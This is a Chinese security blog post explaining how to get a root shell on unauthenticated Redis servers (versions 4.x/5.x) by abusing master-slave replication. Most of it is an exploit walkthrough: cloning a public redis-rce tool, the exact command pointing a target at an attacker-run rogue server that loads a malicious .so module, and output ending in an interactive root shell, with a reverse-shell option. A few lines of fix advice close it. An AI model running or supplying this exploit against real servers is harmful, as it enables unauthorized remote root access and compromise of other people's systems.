登陆 注册

Redis未授权通过主从复制 GetShell[Exp]

桑云信息Lzers 2019-07-10 Redisgetshellexp

脆弱目标查询

漏洞关键词redis 默认端口6379,影响版本 4.x/5.x

QQ图片20190710222450.png

Exp利用

攻击机Ubuntu,ip地址192.168.1.107,下载exp脚本,然后输入参数开始。

git close https://github.com/Ridter/redis-rce
 cd redis-rce
 greekn@greekn:~/redis-rce$ python3 redis-rce.py -r 192.168.1.16 -L 192.168.1.107 -f exp_lin.so
 
 █▄▄▄▄ ▄███▄   ██▄   ▄█    ▄▄▄▄▄       █▄▄▄▄ ▄█▄    ▄███▄   
 █  ▄▀ █▀   ▀  █  █  ██   █     ▀▄     █  ▄▀ █▀ ▀▄  █▀   ▀  
 █▀▀▌  ██▄▄    █   █ ██ ▄  ▀▀▀▀▄       █▀▀▌  █   ▀  ██▄▄    
 █  █  █▄   ▄▀ █  █  ▐█  ▀▄▄▄▄▀        █  █  █▄  ▄▀ █▄   ▄▀ 
   █   ▀███▀   ███▀   ▐                  █   ▀███▀  ▀███▀   
 ▀                                     ▀                   
[*] Connecting to  192.168.1.16:6379...
[*] Sending SLAVEOF command to server
[+] Accepted connection from 192.168.1.16:6379
[*] Setting filename
[+] Accepted connection from 192.168.1.16:6379
[*] Start listening on 192.168.1.107:21000
[*] Tring to run payload
[+] Accepted connection from 192.168.1.16:38875
[*] Closing rogue server...
[+] What do u want ? [i]nteractive shell or [r]everse shell: i
[+] Interactive shell open , use "exit" to exit...
$ whoami
root
$

本次受影响版本

Redis 2.x 3.x 4.x 5.x

修复建议

禁止外部访问redis服务端口

禁止root权限启动redis服务

限制链接redis服务的IP

生成海报
请发表您的评论
桑云信息Lzers

桑云信息Lzers

乐山桑云信息技术有限公司专注于企业安全与网站、小程序、APP架设,为企业客户提供一站式解决方案,帮助企业快速实现互联网+转型。
907文章数 31评论数
请关注微信公众号
微信二维码
不容错过
Powered By SangYun.Net